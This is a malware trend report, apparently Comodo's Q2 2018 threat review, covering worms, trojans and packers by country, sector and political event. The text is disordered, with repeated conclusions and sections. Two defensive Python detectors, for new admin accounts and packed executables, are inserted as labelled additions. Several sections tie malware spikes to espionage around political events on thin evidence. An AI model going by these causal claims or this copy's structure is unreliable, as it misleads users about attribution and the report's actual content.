Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa – precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world, but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

5 Malware in Q2 2018: The Big Picture

Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries’ top-level domains (ccTLD). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.

5.1 Strategic Threat: Computer Worms

A computer worm is like a virus, but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial-of-service. For this Q2 2018 Report we place Worms in a special category called “Strategic Threat” due to their ability to travel very quickly across the Internet and compromise many computers at once.

5.1.1 Generic Worms

This section shows the world’s most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.

5.1.2 Net Worms

A “Net Worm” typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a “multi-threaded, polymorphic” worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.

513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality

This quarter, the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.

5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.

5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.

5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.

5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.

5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.

5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
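The account-creation-then-admin-group behavior attributed to Starter above leaves a clear trail in Windows Security logs. The following is an added example, not part of the Comodo report: it correlates event 4720 (user account created) with a following 4732 (member added to a security-enabled local group) naming the built-in Administrators SID on the same host. The event records are constructed and use simplified field names rather than the raw Windows event XML.

```python
from datetime import datetime, timedelta

# Well-known SID of the built-in Administrators group. A real 4732 event carries the
# group in its TargetSid field and the member in MemberSid; the constructed records
# below flatten those to "group_sid" and "member_sid".
ADMINISTRATORS_SID = "S-1-5-32-544"
EVENT_USER_CREATED = 4720       # "A user account was created"
EVENT_LOCAL_GROUP_ADD = 4732    # "A member was added to a security-enabled local group"
DEFAULT_WINDOW = timedelta(minutes=10)

# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"time": "2018-06-02T09:14:05", "id": 4720, "host": "WS-01", "subject": "alice",
     "target": "svc_remote", "target_sid": "S-1-5-21-1-2-3-1105"},
    {"time": "2018-06-02T09:14:07", "id": 4732, "host": "WS-01", "subject": "alice",
     "member_sid": "S-1-5-21-1-2-3-1105", "group_sid": ADMINISTRATORS_SID},
    # Legitimate onboarding: account created, added to Users (S-1-5-32-545) hours later.
    {"time": "2018-06-02T11:00:00", "id": 4720, "host": "WS-02", "subject": "itadmin",
     "target": "jsmith", "target_sid": "S-1-5-21-1-2-3-1200"},
    {"time": "2018-06-02T15:30:00", "id": 4732, "host": "WS-02", "subject": "itadmin",
     "member_sid": "S-1-5-21-1-2-3-1200", "group_sid": "S-1-5-32-545"},
    # Admin change for a pre-existing account: no matching 4720, so not flagged here.
    {"time": "2018-06-03T08:00:00", "id": 4732, "host": "WS-03", "subject": "itadmin",
     "member_sid": "S-1-5-21-1-2-3-500", "group_sid": ADMINISTRATORS_SID},
]


def find_new_admin_accounts(events, window=DEFAULT_WINDOW):
    """Return one finding per account that was created and then added to the local
    Administrators group on the same host within `window`.

    Creations are remembered per (host, SID) so the later 4732 is matched by SID,
    which still works if the account is renamed between the two events."""
    creations = {}
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == EVENT_USER_CREATED:
            creations[(ev["host"], ev["target_sid"])] = (when, ev)
        elif ev["id"] == EVENT_LOCAL_GROUP_ADD and ev["group_sid"] == ADMINISTRATORS_SID:
            key = (ev["host"], ev["member_sid"])
            if key in creations:
                created_at, created = creations[key]
                delta = when - created_at
                if timedelta(0) <= delta <= window:
                    findings.append({
                        "host": ev["host"],
                        "account": created["target"],
                        "sid": ev["member_sid"],
                        "created_by": created["subject"],
                        "seconds_to_admin": int(delta.total_seconds()),
                    })
    return findings


if __name__ == "__main__":
    for f in find_new_admin_accounts(SAMPLE_EVENTS):
        print(f"[{f['host']}] new account {f['account']} ({f['sid']}) made admin "
              f"{f['seconds_to_admin']}s after creation by {f['created_by']}")
```

On the sample data only the WS-01 pair is reported; the window keeps routine onboarding (create now, grant hours later) out of the result set.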

5.2.4 Exploits

Computer Exploits comprise software, data chunks, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.

5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.

5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.

5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
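The packing mechanism described in this section (compressed code plus a small decompression stub, with section names that a modified UPX may rename) leaves a recognizable footprint in a PE file's headers. The following is an added example, not the report's or UPX's own code: a small PE section-table parser with defender-side heuristics (stock UPX section names, the "UPX!" marker, near-8-bit entropy, an empty writable+executable unpacking section, and an entry point inside a writable+executable section), so that a renamed-section "MUPX" build is still caught by the layout and entropy checks. The sample PE images are constructed in code and are not real binaries.

```python
# Added example (not from the Comodo report): heuristic packer indicators for a PE
# file, covering stock UPX section names and the renamed-section case a "modified
# UPX" produces. The sample PE images are constructed in code, not real binaries.
import math
import random
import struct

IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000  # winnt.h flags
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
ENTROPY_THRESHOLD = 7.0  # bits/byte; compressed or encrypted data sits near 8.0


def shannon_entropy(blob: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input)."""
    n = len(blob)
    counts = [blob.count(bytes([v])) for v in range(256)] if n else []
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(data: bytes):
    """Walk the DOS/COFF headers; return (entry_point_rva, [section dicts])."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = pe_off + 4
    num_sections, opt_size = struct.unpack_from("<H12xH", data, coff + 2)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]  # same offset in PE32/PE32+
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + 40 * i
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        raw = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                         "vaddr": vaddr, "raw_size": raw_size, "chars": chars,
                         "entropy": shannon_entropy(raw)})
    return entry_rva, sections


def assess_packing(data: bytes) -> dict:
    """Collect packer indicators. The verdict needs two of them, so one compressed
    resource section in an ordinary program does not trip it on its own."""
    entry_rva, sections = parse_sections(data)
    rwx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    hits = []
    if any(s["name"].startswith("UPX") for s in sections):
        hits.append("UPX section names present")
    if b"UPX!" in data[:0x1000]:
        hits.append("UPX! marker in header area")
    for s in sections:
        holds_entry = s["vaddr"] <= entry_rva < s["vaddr"] + max(s["vsize"], s["raw_size"])
        if s["raw_size"] and s["entropy"] >= ENTROPY_THRESHOLD:
            hits.append(f"high entropy {s['entropy']:.2f} in {s['name']}")
        if s["raw_size"] == 0 and s["vsize"] and s["chars"] & rwx == rwx:
            hits.append(f"empty-on-disk writable+executable section {s['name']}")  # unpack area
        if holds_entry and s["chars"] & rwx == rwx:
            hits.append(f"entry point inside writable+executable section {s['name']}")
    return {"packed": len(hits) >= 2, "indicators": hits, "sections": sections}


def build_sample_pe(sections, entry_rva: int) -> bytes:
    """Constructed, non-loadable PE32 skeleton: sections = [(name, raw, vsize, chars)]."""
    opt_size, file_align, sect_align = 0xE0, 0x200, 0x1000
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // file_align) * file_align
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew -> PE signature at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)           # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)      # AddressOfEntryPoint
    table, body, raw_ptr, vaddr = b"", b"", hdr_len, sect_align
    for name, raw, vsize, chars in sections:
        raw_size = -(-len(raw) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, vaddr,
                             raw_size, raw_ptr if raw_size else 0, 0, 0, 0, 0, chars)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += -(-max(vsize, raw_size) // sect_align) * sect_align
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(hdr_len, b"\0") + body


def sample_packed(names=("UPX0", "UPX1")) -> bytes:
    """UPX-style layout: empty RWX unpacking area, then a high-entropy RWX section
    holding the entry point. Other names mimic a modified UPX that renames sections."""
    rng = random.Random(1)
    payload = bytes(rng.getrandbits(8) for _ in range(4096))  # stand-in for compressed code
    rwx = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return build_sample_pe([(names[0], b"", 0x10000, rwx), (names[1], payload, 0x1000, rwx),
                            (".rsrc", b"\0" * 512, 0x200, IMAGE_SCN_MEM_READ)], 0x11100)


def sample_plain() -> bytes:
    """Ordinary layout: low-entropy read/execute .text that holds the entry point."""
    code = b"\x55\x8b\xec\x83\xec\x10\x33\xc0\x5d\xc3" * 400
    rx, rw = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    return build_sample_pe([(".text", code, len(code), rx), (".data", b"\0" * 1024, 1024, rw)], 0x1000)
```

Running `assess_packing` over a real sample only needs `open(path, "rb").read()`; the entropy threshold and the two-indicator rule are the knobs to tune against your own clean-file corpus.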

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV, and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications, and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior, and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip, and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider, and/or perform other actions users might not have intended. Such software includes free toolbars, adware, and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical Analysis

In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses, and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not in only one but within multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015, Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan that has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect information as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies, and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
